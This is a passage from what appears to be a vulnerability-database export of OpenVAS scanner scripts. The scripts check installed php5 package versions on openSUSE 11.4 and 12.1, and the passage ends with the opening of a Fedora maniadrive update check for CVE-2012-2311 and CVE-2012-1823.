rpm:\"php5-sockets~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.3.5~332.1\", 
rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.3.5~332.1\", 
rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release 
== \"openSUSE12.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", rpm:\"php5-iconv-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", 
rpm:\"php5-intl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql\", rpm:\"php5-mssql~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mssql-debuginfo\", rpm:\"php5-mssql-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", rpm:\"php5-mysql-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", 
rpm:\"php5-odbc~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", 
rpm:\"php5-pspell~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", 
rpm:\"php5-suhosin~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.3.8~4.15.2\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:1361412562310864253", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864253", "type": "openvas", "title": "Fedora Update for maniadrive FEDORA-2012-7586", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for maniadrive FEDORA-2012-7586\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081286.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864253\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:44 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-7586\");\n script_name(\"Fedora Update for maniadrive FEDORA-2012-7586\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'maniadrive'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"maniadrive on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 